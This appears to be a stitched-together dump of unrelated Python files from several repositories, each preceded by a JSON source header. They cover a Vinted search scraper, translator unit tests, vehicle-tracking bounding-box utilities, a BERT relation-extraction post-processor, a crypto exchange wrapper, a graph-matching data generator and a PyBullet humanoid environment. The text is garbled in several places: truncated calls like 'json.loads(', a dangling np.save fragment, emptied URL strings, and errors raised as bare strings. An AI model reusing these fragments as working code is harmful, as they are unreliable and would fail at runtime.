LIST A list of dictionaries corresponding to one of the JSON file in the DATA folder. Return ------ matched_ids : LIST A list of integer corresponding to the IDs matched. """ matched_ids = [] for data_id in data: if ID.lower() in [data_id[n].lower() for n in id_supported[ID_name]["names"] if n in data_id]: matched_ids.append(data_id["id"]) return matched_ids def isInt(s): """ This function will check if the s object is an integer or not and return the corresponding boolean. Parameters ---------- s : PYTHON OBJECT The Python object that need to be checked. Return ------ A BOOLEAN """ try: int(s) return True except ValueError: return False if "only_string" in id_supported[ID_name] and id_supported[ID_name]["only_string"]: return matchNames(ID_name,ID,data) if isInt(ID): return [int(ID)] return matchNames(ID_name,ID,data) def treeWalk(ID_name,ID,tree): """ Recursive function that will walk through all parents and child of the tree provided as parameter to find the corresponding IDs. Parameters ---------- ID_name : STRING The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'. ID : STRING The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'. tree : LIST A list of dictionaries corresponding to one of the JSON file in the DATA folder, ordered as a tree with parents and childs IDs. Return ------ found_IDs : LIST A list of integer corresponding to the IDs matched. """ found_IDs = findID(ID_name,ID,tree) # Recursive loop for item in tree: if id_supported[ID_name]["nested"] in item and len(item[id_supported[ID_name]["nested"]])>0: found_IDs += treeWalk(ID_name,ID,item[id_supported[ID_name]["nested"]]) return found_IDs IDs_requested = [] # Checking parameters if ID_name not in id_supported: raise f"{str(ID_name)} not supported please check the following supported IDs {' / '.join(id_supported)}" if not isinstance(IDs,list): if isinstance(IDs,str): IDs = [IDs] else: raise f"{str(IDs)} must be a string or a list." # Loading corresponding data with open(file=data_repository+ID_name+".json",mode="r") as f: data = json.loads( # Loop through provided information for ID in IDs: if "nested" in id_supported[ID_name]: IDs_requested += treeWalk(ID_name,ID,data) tmp = [] for i in IDs_requested: if i not in tmp: tmp.append(i) IDs_requested = tmp else: IDs_requested += findID(ID_name,ID,data) return IDs_requested params = { "catalog":catalog, "color":color, "brand":brand, "size":size, "material":material, "status":status, "country":country } url_search = ""+searchText url_params = { "per_page":per_page, "page":page, "price_from":price_from, "price_to":price_to, "currency":currency } for param in params: if len(params[param]) != 0: url_params[id_supported[param]["url_name"]]=matchingIDs(param,params[param]) req = requests.get(url_search,params=url_params) if print_url: print(req.url) items = json.loads(re.findall(r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>',req.text)[0])["items"] return {"items":items["byId"],"searchParams":items["catalogItems"]} def getField(items,field_names=["id"]): """ This function will extract, from the result of Vinted search through searchVinted function, all values of a specific field. For example in each Item there is a field called 'price', with this function you can get a list of all prices from your search. Parameters ---------- items : LIST An item list that corresponds to a list of dictionaries which can be found as the item "items" of the searchVinted response. field_names : LIST, optional A list of field names provided as strings. For examples , "prices","id","photo",etc. Returns ------- VALUES : DICTIONARY The dictionary will corresponds to the name of the field as the key and the list of values as value. """ VALUES = {} for field_name in field_names: VALUES[field_name] = [] for item in items: if field_name not in items[item]: raise f"The field name {field_name} does not exists within the following item :\n {items[item]}" VALUES[field_name].append(items[item][field_name]) return VALUES def getData(ID_name): with open(file=data_repository+ID_name+".json",mode="r") as f: return json.loads( if __name__ == '__main__': JSONfromID() ```
{ "source": "0AlphaZero0/xzceb-flask_eng_fr", "score": 3 }
#### File: machinetranslation/tests/ ```python import unittest from translator import english_to_french, french_to_english class TestTranslateEnToFr(unittest.TestCase): """ Class to test the function english_to_french """ def test1(self): """ Function to test the function english_to_french """ self.assertIsNone(english_to_french(None)) self.assertEqual(english_to_french("Hello"), "Bonjour") self.assertNotEqual(english_to_french("Bonjour"), "Hello") class TestTranslateFrToEn(unittest.TestCase): """ Class to test the function french_to_english """ def test1(self): """ Function to test the function french_to_english """ self.assertIsNone(french_to_english(None)) self.assertEqual(french_to_english("Bonjour"), "Hello") self.assertNotEqual(french_to_english("Hello"), "Bonjour") unittest.main() ```
{ "source": "0AnonymousSite0/Data-and-Codes-for-Integrating-Computer-Vision-and-Traffic-Modelling", "score": 3 }
#### File: Detecting and tracking vehicle (CPU version)/blobs/ ```python def get_centroid(bounding_box): (x, y, w, h) = bounding_box return (round((x + x + w) / 2), round((y + y + h) / 2)) def box_contains_point(bbox, pt): return bbox[0] < pt[0] < bbox[0] + bbox[2] and bbox[1] < pt[1] < bbox[1] + bbox[3] def get_area(bbox): _, _, w, h = bbox return w * h def get_iou(bbox1, bbox2): # calculate the Intersection over Union (IoU) of two bounding boxes bbox1_x1 = bbox1[0] bbox1_y1 = bbox1[1] bbox1_x2 = bbox1[0] + bbox1[2] bbox1_y2 = bbox1[1] + bbox1[3] bbox2_x1 = bbox2[0] bbox2_y1 = bbox2[1] bbox2_x2 = bbox2[0] + bbox2[2] bbox2_y2 = bbox2[1] + bbox2[3] overlap_x1 = max(bbox1_x1, bbox2_x1) overlap_y1 = max(bbox1_y1, bbox2_y1) overlap_x2 = min(bbox1_x2, bbox2_x2) overlap_y2 = min(bbox1_y2, bbox2_y2) overlap_width = overlap_x2 - overlap_x1 overlap_height = overlap_y2 - overlap_y1 if overlap_width < 0 or overlap_height < 0: return 0.0 overlap_area = overlap_width * overlap_height bbox1_area = (bbox1_x2 - bbox1_x1) * (bbox1_y2 - bbox1_y1) bbox2_area = (bbox2_x2 - bbox2_x1) * (bbox2_y2 - bbox2_y1) combined_area = bbox1_area + bbox2_area - overlap_area epsilon = 1e-5 # small value to prevent division by zero iou = overlap_area / (combined_area + epsilon) return iou def get_inside(bbox1, bbox2): # calculate the Intersection over Union (IoU) of two bounding boxes bbox1_x1 = bbox1[0] bbox1_y1 = bbox1[1] bbox1_x2 = bbox1[0] + bbox1[2] bbox1_y2 = bbox1[1] + bbox1[3] bbox2_x1 = bbox2[0] bbox2_y1 = bbox2[1] bbox2_x2 = bbox2[0] + bbox2[2] bbox2_y2 = bbox2[1] + bbox2[3] inside=0 if bbox1_x1<bbox2_x1 and bbox1_y1<bbox2_y1 and bbox1_x2>bbox2_x2 and bbox1_y2>bbox2_y2: inside=1 elif bbox1_x1 > bbox2_x1 and bbox1_y1 > bbox2_y1 and bbox1_x2 < bbox2_x2 and bbox1_y2 < bbox2_y2: inside = 2 else: inside=0 return inside ``` #### File: Detecting and tracking vehicle (GPU version)/util/ ```python import cv2 import os import sys import pathlib import json import uuid from datetime import datetime def send_to_stdout(level, message, data): events_to_not_log = ['TRACKER_UPDATE'] #if data['event'] not in events_to_not_log: #print('[{0}]'.format(, level + ':', message, json.dumps(data)) def send_to_log_file(): pass def send_to_redis_pubsub(): pass def log_error(message, data): send_to_stdout('ERROR', message, data) sys.exit(0) def log_info(message, data): send_to_stdout('INFO', message, data) def log_debug(message, data): send_to_stdout('DEBUG', message, data) def take_screenshot(frame): screenshots_directory = 'data/screenshots' pathlib.Path(screenshots_directory).mkdir(parents=True, exist_ok=True) screenshot_path = os.path.join(screenshots_directory, 'img_' + uuid.uuid4().hex + '.jpg') cv2.imwrite(screenshot_path, frame, [cv2.IMWRITE_JPEG_QUALITY, 80]) log_info('Screenshot captured.', { 'event': 'SCREENSHOT_CAPTURE', 'path': screenshot_path, }) ```
{ "source": "0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model", "score": 2 }
#### File: Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/ ```python import os import json # 获取最新模型预测数据文件夹 def get_latest_model_predict_data_dir(new_epochs_ckpt_dir=None): # 获取文件下最新文件路径 def new_report(test_report): lists = os.listdir(test_report) # 列出目录的下所有文件和文件夹保存到lists lists.sort(key=lambda fn: os.path.getmtime(test_report + "/" + fn)) # 按时间排序 file_new = os.path.join(test_report, lists[-1]) # 获取最新的文件保存到file_new return file_new if new_epochs_ckpt_dir is None: # 获取分类预测输出文件路径 input_new_epochs = os.path.join( os.path.abspath(os.path.join(os.path.dirname(__file__), "output")), "sequnce_infer_out") # 获取最新周期文件路径 new_ckpt_dir = new_report(input_new_epochs) input_new_epochs_ckpt = os.path.join(input_new_epochs, new_ckpt_dir) # 获取最新周期下最新模型文件路径 new_epochs_ckpt_dir = new_report(input_new_epochs_ckpt) if not os.path.exists(new_ckpt_dir): raise ValueError("路径不存在!{}".format(new_epochs_ckpt_dir)) return new_epochs_ckpt_dir # dict is comes from raw_data all_50_schemas schemas_dict_relation_2_object_subject_type = { 'Road_status':[('Status','Road')], 'Lane_status':[('Status','Lane')], 'Road_position':[('Position_of_road','Road')], # 'At':[('Road','Road')], # 'PRIOR':[('Road','Road')], # 'PAST':[('Road','Road')], # 'Bet':[('Road','Road')], 'Lane_of_Road':[('Road','Lane')], 'Lane_direction':[('Direction_of_lane','Lane')], 'Lane_position':[('Position_of_lane','Lane')], 'Road_direction':[('Direction_of_road','Road')], #'Lane_number':[('Number','Lane')] # '父亲': [('人物', '人物')], # '妻子': [('人物', '人物')], # '母亲': [('人物', '人物')], # '丈夫': [('人物', '人物')], # '祖籍': [('地点', '人物')], # '总部地点': [('地点', '企业')], # '出生地': [('地点', '人物')], # '目': [('目', '生物')], # '面积': [('Number', '行政区')], # '简称': [('Text', '机构')], # '上映时间': [('Date', '影视作品')], # '所属专辑': [('音乐专辑', '歌曲')], # '注册资本': [('Number', '企业')], # '首都': [('城市', '国家')], # '导演': [('人物', '影视作品')], # '字': [('Text', '历史人物')], # '身高': [('Number', '人物')], # '出品公司': [('企业', '影视作品')], # '修业年限': [('Number', '学科专业')], # '出生日期': [('Date', '人物')], # '制片人': [('人物', '影视作品')], # '编剧': [('人物', '影视作品')], # '国籍': [('国家', '人物')], # '海拔': [('Number', '地点')], # '连载网站': [('网站', '网络小说')], # '朝代': [('Text', '历史人物')], # '民族': [('Text', '人物')], # '号': [('Text', '历史人物')], # '出版社': [('出版社', '书籍')], # '主持人': [('人物', '电视综艺')], # '专业代码': [('Text', '学科专业')], # '歌手': [('人物', '歌曲')], # '作词': [('人物', '歌曲')], # '主角': [('人物', '网络小说')], # '董事长': [('人物', '企业')], # '成立日期': [('Date', '机构'), ('Date', '企业')], # '毕业院校': [('学校', '人物')], # '占地面积': [('Number', '机构')], # '官方语言': [('语言', '国家')], # '邮政编码': [('Text', '行政区')], # '人口数量': [('Number', '行政区')], # '所在城市': [('城市', '景点')], # '作者': [('人物', '图书作品')], # '作曲': [('人物', '歌曲')], # '气候': [('气候', '行政区')], # '嘉宾': [('人物', '电视综艺')], # '主演': [('人物', '影视作品')], # '改编自': [('作品', '影视作品')], # '创始人': [('人物', '企业')] } class File_Management(object): """读取TXT文件,以列表形式返回文件内容""" def __init__(self, TEST_DATA_DIR=None, MODEL_OUTPUT_DIR=None, Competition_Mode=True): self.TEST_DATA_DIR = TEST_DATA_DIR self.MODEL_OUTPUT_DIR = get_latest_model_predict_data_dir(MODEL_OUTPUT_DIR) self.Competition_Mode = Competition_Mode def file_path_and_name(self): text_sentence_file_path = os.path.join(self.TEST_DATA_DIR, "text_and_one_predicate.txt") token_in_file_path = os.path.join(self.TEST_DATA_DIR, "token_in_not_UNK_and_one_predicate.txt") predicate_token_label_file_path = os.path.join(self.MODEL_OUTPUT_DIR, "token_label_predictions.txt") file_path_list = [text_sentence_file_path, token_in_file_path, predicate_token_label_file_path] file_name_list = ["text_sentence_list", "token_in_not_NUK_list ", "token_label_list",] if not self.Competition_Mode: spo_out_file_path = os.path.join(self.TEST_DATA_DIR, "spo_out.txt") if os.path.exists(spo_out_file_path): file_path_list.append(spo_out_file_path) file_name_list.append("reference_spo_list") return file_path_list, file_name_list def read_file_return_content_list(self): file_path_list, file_name_list = self.file_path_and_name() content_list_summary = [] for file_path in file_path_list: with open(file_path, "r", encoding='utf-8') as f: content_list = f.readlines() content_list = [content.replace("\n", "") for content in content_list] content_list_summary.append(content_list) if self.Competition_Mode: content_list_length_summary = [(file_name, len(content_list)) for content_list, file_name in zip(content_list_summary, file_name_list)] file_line_number = self._check_file_line_numbers(content_list_length_summary) print("Competition_Mode=True, check file line pass!") print("输入文件行数一致,行数是: ", file_line_number) else: file_line_number = len(content_list_summary[0]) print("first file line number: ", file_line_number) print("do not check file line! if you need check file line, set Competition_Mode=True") print("\n") return content_list_summary, file_line_number def _check_file_line_numbers(self, content_list_length_summary): content_list_length_file_one = content_list_length_summary[0][1] for file_name, file_line_number in content_list_length_summary: assert file_line_number == content_list_length_file_one return content_list_length_file_one class Sorted_relation_and_entity_list_Management(File_Management): """ 生成按概率大小排序的可能关系列表和按照原始句子中顺序排序的实体列表 """ def __init__(self, TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=False): File_Management.__init__(self, TEST_DATA_DIR=TEST_DATA_DIR, MODEL_OUTPUT_DIR=MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode) # 关系列表 把模型输出的实数值对应为标签 #self.relationship_label_list = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期', '创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站', '邮政编码', '面积', '首都'] self.relationship_label_list = ['Road_status','Lane_status','At','PRIOR', 'PAST', 'Bet', 'LaneOfRoad','Lane_direction','Lane_position','Road_direction','Lane_number'] self.Competition_Mode = Competition_Mode print("test数据输入路径是:\t{}".format(self.TEST_DATA_DIR)) print("最新模型预测结果路径是:\t{}".format(self.MODEL_OUTPUT_DIR)) def get_input_list(self,): content_list_summary, self.file_line_number = self.read_file_return_content_list() if len(content_list_summary) == 4: [text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list] = content_list_summary elif len(content_list_summary) == 3: [text_sentence_list, token_in_not_NUK_list, token_label_list] = content_list_summary reference_spo_list = [None] * len(text_sentence_list) else: raise ValueError("check code!") print(reference_spo_list) return text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list #合并由WordPiece切分的词和单字 def _merge_WordPiece_and_single_word(self, entity_sort_list): # [..['B-SUB', '新', '地', '球', 'ge', '##nes', '##is'] ..]---> [..('SUB', '新地球genesis')..] entity_sort_tuple_list = [] for a_entity_list in entity_sort_list: entity_content = "" entity_type = None for idx, entity_part in enumerate(a_entity_list): if idx == 0: entity_type = entity_part if entity_type[:2] not in ["B-", "I-"]: break else: if entity_part.startswith("##"): entity_content += entity_part.replace("##", "") else: entity_content += entity_part if entity_content != "": entity_sort_tuple_list.append((entity_type[2:], entity_content)) return entity_sort_tuple_list # 把spo_out.txt 的[SPO_SEP] 分割形式转换成标准列表字典形式 # 妻子 人物 人物 杨淑慧 周佛海[SPO_SEP]丈夫 人物 人物 周佛海 杨淑慧 ---> dict def preprocessing_reference_spo_list(self, refer_spo_str): refer_spo_list = refer_spo_str.split("[SPO_SEP]") refer_spo_list = [spo.split(" ") for spo in refer_spo_list] refer_spo_list = [dict([('predicate', spo[0]), ('object_type', spo[2]), ('subject_type', spo[1]), ('object', spo[4]), ('subject', spo[3])]) for spo in refer_spo_list] print(refer_spo_list) refer_spo_list.sort(key= lambda item:item['predicate']) return refer_spo_list # 把模型输出实体标签按照原句中相对位置输出 def model_token_label_2_entity_sort_tuple_list(self, token_in_not_UNK_list, predicate_token_label_list): """ :param token_in_not_UNK: ['紫', '菊', '花', '草', '是', '菊', '目', ',', '菊', '科', ',', '松', '果', '菊', '属', '的', '植', '物'] :param predicate_token_label: ['B-SUB', 'I-SUB', 'I-SUB', 'I-SUB', 'O', 'B-OBJ', 'I-OBJ', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O'] :return: [('SUB', '紫菊花草'), ('OBJ', '菊目')] """ # 除去模型输出的特殊符号 def preprocessing_model_token_lable(predicate_token_label_list, token_in_list_lenth): # ToDo:检查错误,纠错 if predicate_token_label_list[0] == "[CLS]": predicate_token_label_list = predicate_token_label_list[1:] # y_predict.remove('[CLS]') if len(predicate_token_label_list) > token_in_list_lenth: # 只取输入序列长度即可 predicate_token_label_list = predicate_token_label_list[:token_in_list_lenth] return predicate_token_label_list # 预处理标注数据列表 predicate_token_label_list = preprocessing_model_token_lable(predicate_token_label_list, len(token_in_not_UNK_list)) entity_sort_list = [] entity_part_list = [] #TODO:需要检查以下的逻辑判断,可能写的不够完备充分 for idx, token_label in enumerate(predicate_token_label_list): # 如果标签为 "O" if token_label == "O": # entity_part_list 不为空,则直接提交 if len(entity_part_list) > 0: entity_sort_list.append(entity_part_list) entity_part_list = [] # 如果标签以字符 "B-" 开始 if token_label.startswith("B-"): # 如果 entity_part_list 不为空,则先提交原来 entity_part_list if len(entity_part_list) > 0: entity_sort_list.append(entity_part_list) entity_part_list = [] entity_part_list.append(token_label) entity_part_list.append(token_in_not_UNK_list[idx]) # 如果到了标签序列最后一个标签处 if idx == len(predicate_token_label_list) - 1: entity_sort_list.append(entity_part_list) # 如果标签以字符 "I-" 开始 或者等于 "[##WordPiece]" if token_label.startswith("I-") or token_label == "[##WordPiece]": # entity_part_list 不为空,则把该标签对应的内容并入 entity_part_list if len(entity_part_list) > 0: entity_part_list.append(' ') #英文需要这一行,中文不需要这一行 entity_part_list.append(token_in_not_UNK_list[idx]) # 如果到了标签序列最后一个标签处 if idx == len(predicate_token_label_list) - 1: entity_sort_list.append(entity_part_list) # 如果遇到 [SEP] 分隔符,说明需要处理的标注部分已经结束 if token_label == "[SEP]": break entity_sort_tuple_list = self._merge_WordPiece_and_single_word(entity_sort_list) print(entity_sort_tuple_list) return entity_sort_tuple_list # 生成排好序的关系列表和实体列表 def produce_relationship_and_entity_sort_list(self): text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list = self.get_input_list() for [text_sentence, token_in_not_UNK, token_label, refer_spo_str] in\ zip(text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list): text = text_sentence.split("\t")[0] text_predicate = text_sentence.split("\t")[1] token_in = token_in_not_UNK.split("\t")[0].split(" ") token_in_predicate = token_in_not_UNK.split("\t")[1] assert text_predicate == token_in_predicate token_label_out = token_label.split(" ") entity_sort_tuple_list = self.model_token_label_2_entity_sort_tuple_list(token_in, token_label_out) if self.Competition_Mode: yield text, text_predicate, entity_sort_tuple_list, None else: if refer_spo_str is not None: refer_spo_list = self.preprocessing_reference_spo_list(refer_spo_str) else: refer_spo_list = [] yield text, text_predicate, entity_sort_tuple_list, refer_spo_list # 打印排好序的关系列表和实体列表 def show_produce_relationship_and_entity_sort_list(self): idx = 0 for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list(): print("序号: ", idx + 1) print("原句: ", text) print("预测的关系: ", text_predicate) print("预测的实体: ", entity_sort_tuple_list) print("参考的 spo_slit:", refer_spo_list) print("\n") idx += 1 if idx == 100: break def produce_output_file(self, OUT_RESULTS_DIR=None, keep_empty_spo_list=False): filename = "subject_predicate_object_predict_output.json" output_dict = dict() for text, text_predicate, entity_sort_tuple_list, refer_spo_list in self.produce_relationship_and_entity_sort_list(): object_type, subject_type = schemas_dict_relation_2_object_subject_type[text_predicate][0] subject_list = [value for name, value in entity_sort_tuple_list if name == "SUB"] subject_list = list(set(subject_list)) subject_list = [value for value in subject_list if len(value) >= 2] object_list = [value for name, value in entity_sort_tuple_list if name == "OBJ"] object_list = list(set(object_list)) object_list = [value for value in object_list if len(value) >= 2] if len(subject_list) == 0 or len(object_list) == 0: output_dict.setdefault(text, []) for subject_value in subject_list: for object_value in object_list: output_dict.setdefault(text, []).append({"object_type": object_type, "predicate": text_predicate, "object": object_value, "subject_type": subject_type, "subject": subject_value}) if keep_empty_spo_list: filename = "keep_empty_spo_list_" + filename if OUT_RESULTS_DIR is None: out_path = filename else: out_path = os.path.join(OUT_RESULTS_DIR, filename) print("生成结果的输出路径是:\t{}".format(out_path)) if not os.path.exists(OUT_RESULTS_DIR): os.makedirs(OUT_RESULTS_DIR) result_json_write_f = open(out_path, "w", encoding='utf-8') count_line_number = 0 count_empty_line_number = 0 for text, spo_list in output_dict.items(): count_line_number += 1 line_dict = dict() line_dict["text"] = text line_dict["spo_list"] = spo_list line_json = json.dumps(line_dict, ensure_ascii=False) if len(spo_list) == 0: count_empty_line_number += 1 if keep_empty_spo_list: result_json_write_f.write(line_json + "\n") else: if len(spo_list) > 0: result_json_write_f.write(line_json + "\n") print("empty_line: {}, line: {}, percentage: {:.2f}%".format(count_empty_line_number, count_line_number, (count_empty_line_number / count_line_number) * 100)) if __name__=='__main__': TEST_DATA_DIR = "bin/subject_object_labeling/sequence_labeling_data/test" # MODEL_OUTPUT_DIR = "output/sequnce_infer_out/epochs9/ckpt20000" MODEL_OUTPUT_DIR = None OUT_RESULTS_DIR = "output/final_text_spo_list_result" Competition_Mode = True spo_list_manager = Sorted_relation_and_entity_list_Management(TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode) spo_list_manager.produce_output_file(OUT_RESULTS_DIR=OUT_RESULTS_DIR, keep_empty_spo_list=True) ```
{ "source": "0anton/pnl-analysis", "score": 3 }
#### File: src/abstract/ ```python from abc import ABC, abstractmethod from requests import get from requests.models import PreparedRequest import json class ExchangeClientWrapper(ABC): def __init__(self, client): self.client = client @staticmethod @abstractmethod def createInstance(): pass @abstractmethod def usd_price_for(self,symbol): pass @abstractmethod def get_asset_balance(self, asset): pass @abstractmethod def get_current_asset_balance(self, trading_pair): pass @abstractmethod def get_trades(self, symbol, start_date): pass @abstractmethod def format_data(self,df): pass ```
{ "source": "0aqz0/graph-matching", "score": 3 }
#### File: 0aqz0/graph-matching/ ```python import matplotlib.pyplot as plt from matplotlib import patches import numpy as np import torch import pickle import json import random import math import os # classes_num = 6 labels = ["tree", "car", "bike", "pedestrain", "well", "light"] colors = ["green", "black", "royalblue", "bisque", "grey", "yellow"] total_num = 64 min_x = 0 max_x = 640 min_y = 0 max_y = 480 noise_mu = 0 noise_var = 2.0 visual_range = 160.0 visual_theta = 60.0 # degree save_path = "./data/" + str(max_x) + "x" + str(max_y) +"/"+ str(total_num) if not os.path.exists(save_path): os.makedirs(save_path) def create_global_map(): global_map = [] for _ in range(total_num): random_x = random.random() * (max_x - min_x) + min_x random_y = random.random() * (max_y - min_y) + min_y random_label = random.randint(0, len(labels)-1) landmark = [random_x, random_y, random_label] global_map.append(landmark) return global_map def visualize_map(map): for landmark in map: plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]]) def add_gaussian_noise(map): noise_map = [] for landmark in map: noise = np.random.normal(noise_mu, noise_var, 2) new_x = landmark[0] + noise[0] new_y = landmark[1] + noise[1] new_label = landmark[2] landmark = [new_x, new_y, new_label] noise_map.append(landmark) return noise_map def create_local_map(map): random_x = random.random() * (max_x - min_x) + min_x random_y = random.random() * (max_y - min_y) + min_y random_ori = random.random() * math.pi * 2 - math.pi base_pose = [random_x, random_y, random_ori] translation = np.array([-random_x, -random_y]).T translation = np.expand_dims(translation, axis=1) rotation = np.array([[np.cos(random_ori-math.pi/2), np.sin(random_ori-math.pi/2)], [-np.sin(random_ori-math.pi/2), np.cos(random_ori-math.pi/2)]]) local_map = [] match = [] for i, landmark in enumerate(map): global_pose = np.array([landmark[0], landmark[1]]).T global_pose = np.expand_dims(global_pose, axis=1) local_pose = (rotation @ (global_pose + translation)) local_x = local_pose[0][0] local_y = local_pose[1][0] local_label = landmark[2] local_landmark = [local_x, local_y, local_label] theta = math.atan2(local_landmark[1], local_landmark[0]) / math.pi * 180.0 if math.hypot(local_x, local_y) < visual_range and theta > 90 - visual_theta and theta < 90 + visual_theta: local_map.append(local_landmark) match.append(i) return base_pose, local_map, match def visualize_all(global_map, local_map, base_pose): # global map plt.subplot(121) plt.gcf().gca().title.set_text("Global Map") plt.gcf().set_figheight(10) plt.gcf().set_figwidth(20) # plt.gcf().gca().set_xlabel("X(m)") # plt.gcf().gca().set_ylabel("Y(m)") for landmark in global_map: plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]]) # base pose plt.scatter(base_pose[0], base_pose[1], s=80, c='r', marker=(5, 1)) orientation = [base_pose[0] + visual_range * math.cos(base_pose[2]), base_pose[1] + visual_range * math.sin(base_pose[2])] plt.plot([base_pose[0], orientation[0]], [base_pose[1], orientation[1]], c='r') arc = patches.Arc((base_pose[0], base_pose[1]), 2 * visual_range, 2 * visual_range, base_pose[2] * 180.0 / math.pi, -visual_theta, visual_theta, color='r', linewidth=2, fill=False) plt.gcf().gca().add_patch(arc) theta_min = [base_pose[0] + visual_range * math.cos(base_pose[2] + visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] + visual_theta / 180.0 * math.pi)] plt.plot([base_pose[0], theta_min[0]], [base_pose[1], theta_min[1]], c='r') theta_max = [base_pose[0] + visual_range * math.cos(base_pose[2] - visual_theta / 180.0 * math.pi), base_pose[1] + visual_range * math.sin(base_pose[2] - visual_theta / 180.0 * math.pi)] plt.plot([base_pose[0], theta_max[0]], [base_pose[1], theta_max[1]], c='r') # local map plt.subplot(122) plt.gcf().gca().title.set_text("Local Map") # plt.gcf().gca().set_xlabel("X(m)") # plt.gcf().gca().set_ylabel("Y(m)") plt.scatter(0, 0, s=80, c='r', marker=(5, 1)) for landmark in local_map: plt.scatter(landmark[0], landmark[1], c=colors[landmark[2]], marker=(5, 0)) def gen_dataset(): # keypoints list(float(x,y)) # scores float(1.) # descriptors list(int[0,len(labels)]*total_nums) # matches list(float(x,y)) # matching_scores list(float(1.)) # base_pose float(x,y) # init raw data gm = create_global_map() bp, lm, match = create_local_map(gm) # make sure that lm is not empty while(len(lm)==0): bp, lm, match = create_local_map(gm) gm = add_gaussian_noise(gm) bp = torch.Tensor(bp[0:2]) # base map gsize = len(gm) keypoints0 = torch.from_numpy(np.array(gm)[:, 0:2]) scores0 = torch.ones(gsize) descriptors0 = torch.Tensor([[i[2]] for i in gm]) idx = iter(range(gsize)) matches0 = torch.Tensor([next(idx) if i in match else -1 for i in range(gsize)]) matching_scores0 = torch.Tensor([1. if matches0[i] > -1 else 0. for i in range(gsize)]) # match map lsize = len(lm) keypoints1 = torch.from_numpy(np.array(lm)[:, 0:2]) scores1 = torch.ones(lsize) descriptors1 = torch.Tensor([[i[2]] for i in lm]) matches1 = match matching_scores1 = torch.ones(lsize) data = dict({'keypoints0': keypoints0, 'keypoints1': keypoints1, 'scores0': scores0, 'scores1': scores1, 'descriptors0': descriptors0, 'descriptors1': descriptors1, 'matches0': matches0, 'matches1': matches1, 'matching_scores0': matching_scores0, 'matching_scores1': matching_scores1, 'base_pose': bp}) return data if __name__ == '__main__': # create global map # global_map = create_global_map() # visualize_map(global_map) # add noise # noise_map = add_gaussian_noise(global_map) # visualize_map(noise_map) # create local map # base_pose, local_map, _= create_local_map(global_map) # visualize all # visualize_all(global_map, local_map, base_pose) # print(gen_dataset()) for i in range(1): # pickle.dump(gen_dataset(), open(os.path.join(save_path, str(i).zfill(4)+".pkl"), "wb")), str(i).zfill(4)+".npy"), gen_dataset()) ```
{ "source": "0aqz0/humanoid-gym", "score": 2 }
#### File: humanoid_gym/envs/ ```python import os import gym from gym import spaces from gym.utils import seeding import pybullet as p import pybullet_data import numpy as np class DancerEnv(gym.Env): """docstring for DancerEnv""" def __init__(self): super(DancerEnv, self).__init__() p.connect(p.GUI) p.resetDebugVisualizerCamera(cameraDistance=1.5, cameraYaw=0, cameraPitch=-20, cameraTargetPosition=[0,0,0.1]) self.reset() def step(self, action, custom_reward=None): p.configureDebugVisualizer(p.COV_ENABLE_SINGLE_STEP_RENDERING) p.setJointMotorControlArray(self.dancerUid, [self.joint2Index[joint] for joint in self.joint_names], p.POSITION_CONTROL, action) p.stepSimulation() # get states jointStates = {} for joint in self.joint_names: jointStates[joint] = p.getJointState(self.dancerUid, self.joint2Index[joint]) linkStates = {} for link in self.link_names: linkStates[link] = p.getLinkState(self.dancerUid, self.link2Index[link]) # recover color for index, color in self.linkColor.items(): p.changeVisualShape(self.dancerUid, index, rgbaColor=color) # check collision collision = False for link in self.link_names: if len(p.getContactPoints(bodyA=self.dancerUid, linkIndexA=self.link2Index[link])) > 0: collision = True for contact in p.getContactPoints(bodyA=self.dancerUid, bodyB=self.dancerUid, linkIndexA=self.link2Index[link]): print("Collision Occurred in Link {} & Link {}!!!".format(contact[3], contact[4])) p.changeVisualShape(self.dancerUid, contact[3], rgbaColor=[1,0,0,1]) p.changeVisualShape(self.dancerUid, contact[4], rgbaColor=[1,0,0,1]) self.step_counter += 1 if custom_reward is None: # default reward reward = 0 done = False else: # custom reward reward, done = custom_reward(jointStates=jointStates, linkStates=linkStates, collision=collision, step_counter=self.step_counter) info = {'collision': collision} observation = [jointStates[joint][0] for joint in self.joint_names] return observation, reward, done, info def reset(self): p.resetSimulation() self.step_counter = 0 self.dancerUid = p.loadURDF(os.path.join(os.path.dirname(os.path.realpath(__file__)), "assets/dancer/dancer_urdf_model.URDF"), basePosition=[-0.3,-0.3,0.3], baseOrientation=[0, 0.7071068, -0.7071068, 0], flags=p.URDF_USE_SELF_COLLISION+p.URDF_USE_SELF_COLLISION_EXCLUDE_ALL_PARENTS) p.setAdditionalSearchPath(pybullet_data.getDataPath()) self.ground_id = p.loadMJCF("mjcf/ground_plane.xml") # ground plane p.setGravity(0,0,-10) p.setPhysicsEngineParameter(numSolverIterations=150) p.setTimeStep(1./240.) self.joint_names = [] self.joint2Index = {} # index map to jointName self.link_names = [] self.link2Index = {} # index map to linkName self.lower_limits = [] self.upper_limits = [] self.init_angles = [] for index in range(p.getNumJoints(self.dancerUid)): jointName = p.getJointInfo(self.dancerUid, index)[1].decode('utf-8') linkName = p.getJointInfo(self.dancerUid, index)[12].decode('utf-8') self.joint_names.append(jointName) 